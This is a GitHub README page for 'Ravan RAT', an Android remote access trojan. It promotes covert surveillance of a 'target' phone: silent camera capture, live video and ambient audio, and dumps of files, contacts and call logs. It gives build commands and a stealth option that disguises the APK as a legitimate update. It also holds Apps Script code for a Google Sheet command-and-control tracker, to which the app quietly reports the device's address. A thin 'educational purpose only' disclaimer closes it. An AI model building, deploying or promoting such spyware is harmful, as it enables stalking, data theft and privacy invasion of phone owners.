Skip to content

someshsrichandan/RavanRAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

21 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ”₯ Ravan RAT

Ravan Logo

Remote Android Administration Tool with Web Panel

🧠 The Core Concept: Direct IPv6 Access

Direct IPv6 Access Concept

"Why do I need a server? Wait, I don't!"

During security research, we discovered a fascinating behavior in modern Android networking. When an Android device connects to mobile data (and many modern WiFi networks), it is assigned a Public IPv6 Address.

Unlike IPv4, which is heavily NAT'd (Network Address Translation) and requires complex Port Forwarding to access from the outside, IPv6 addresses are often directly routeable on the public internet.

How Ravan RAT Exploits This:

  1. Local HTTP Server: The app starts a lightweight HTTP server on the Android device (Port 8080).
  2. The IPv6 Feature/Bug: Because the device has a Public IPv6, you can access this server directly from anywhere in the world just by typing the IP address in your browser. No router config, no firewall bypass, no NGROK.
  3. The Problem (Dynamic IPs): Mobile networks rotate IPs frequently. Your target's IP changes every time they reconnect.
  4. The Solution (Google Sheet): We use a simple Google Sheet as a "Command & Control" (C2) tracker. The app detects its own Public IPv6 and quietly posts it to your Google Sheet. You open the sheet, click the link, and you are connected directly to the device.

TL;DR: We turn the Android phone into a public web server and use Google Sheets as a dynamic phonebook to find it.


🚨 Google Sheet Control - No Server Needed!

No Port Forwarding. No Server. Just a Google Sheet.

Control devices using just a Google Sheet!

  • βœ… No need for port forwarding
  • βœ… No server setup required
  • βœ… Works behind any firewall/NAT
  • βœ… Control from anywhere with just a Google Sheet

Star ⭐ this repo to stay updated!


πŸ“’ Updates Every Sunday!

New features drop every week. Star ⭐ this repo to stay updated!

Got ideas? Open an issue or DM me. Contributions welcome!


πŸš€ Quick Build

Windows

cd builder
.\build.ps1

Linux / Mac

cd builder
chmod +x build.sh
./build.sh

New Builder v2.0 Features:

  • Signed & Unsigned APKs: Automatically generates both signed.apk (for release) and unsigned.apk.
  • Advanced Identity: Customize App Name, Package Name (ID), and Min SDK.
  • Stealth Mode: Randomly generates Version Name and Version Code to look like legitimate updates.
  • Smart Logo:
    • Automatically resizes any image to all Android densities.
    • Optional Transparency Generation (removes white backgrounds).
    • Forces "Legacy Mode" to bypass adaptive icons on newer Androids.

πŸ“– For detailed build guide, read Builder README

✨ Features

Device Access

  • πŸ“ File Manager: Browsable directory of the entire phone storage.
  • πŸ“ž Call Logs: Read-only view of recent calls.
  • πŸ‘₯ Contacts: Dump of local contacts.
  • πŸ“± Device Info: Battery, Model, Android Version.

Surveillance

  • πŸ“Έ Remote Camera: Trigger front/back camera to take silent photos.
  • πŸŽ₯ Live Stream: Watch a low-latency MJPEG stream from the device.
  • 🎀 Audio: Listen to ambient background noise.

πŸ“‹ Usage Workflow

  1. Build & Install: Create the APK using the builder and install it on the target.
  2. The Link: The app will automatically POST its location to your Google Sheet.
    • Format: http://[IP_v6_Address]:Port/
    • Example: http://[2409:40e2:209c:1f7a:xxxx:xxxx:xxxx:xxxx]:8080/
  3. Connect: Click the link in your Google Sheet.
  4. Control: You will see the Ravan Web Panel running directly on the phone. All commands sent go straight to the device, and data comes straight back to you. P2P at its finest.

πŸ“Έ Screenshots

πŸ“Š Google Sheet Tracking

Excel Tracking

πŸ“± Web Panel & Features

Panel 1 Panel 2 Panel 3
Panel 4 Panel 6
Panel 7 Panel 8 Panel 9

πŸ“Š Google Sheet Setup

Want device IPs in a spreadsheet?

  1. Create Google Sheet
  2. Extensions β†’ Apps Script
  3. Paste this UPDATED code:
function doPost(e) {
  var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
  var data = JSON.parse(e.postData.contents);

  // Get current date/time
  var timestamp = new Date();

  // Add row with: Timestamp | IP | Port | Device Name | Clickable Link
  sheet.appendRow([
    timestamp,
    data.ip,
    data.port,
    data.device,
    data.link, // <--- NEW! Direct Clickable Link
  ]);

  return ContentService.createTextOutput("Success");
}
  1. Deploy β†’ Web App β†’ Anyone
  2. Copy URL β†’ Paste in builder when asked.

πŸ“‚ Folder Structure

ravan/
β”œβ”€β”€ ravanrat.png          # Logo
β”œβ”€β”€ builder/
β”‚   β”œβ”€β”€ build.sh          # Linux/Mac
β”‚   β”œβ”€β”€ build.bat         # Windows CMD
β”‚   β”œβ”€β”€ build.ps1         # Windows PowerShell
β”‚   └── output/           # Built APKs (Signed & Unsigned)
└── app/                  # Android source

🀝 Contribute

Found a bug? Have an idea?

  • Open an issue
  • Submit a PR
  • DM me on LinkedIn

All contributions welcome!


πŸ‘¨β€πŸ’» Developer

Somesh

GitHub LinkedIn


⚠️ Disclaimer

Educational purpose only. Don't use without permission. I'm not responsible for misuse.


πŸ“œ License

MIT License


⭐ Star this repo for updates!

About

Android RAT with Web Panel | Google Sheet Control - No Server Needed!

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages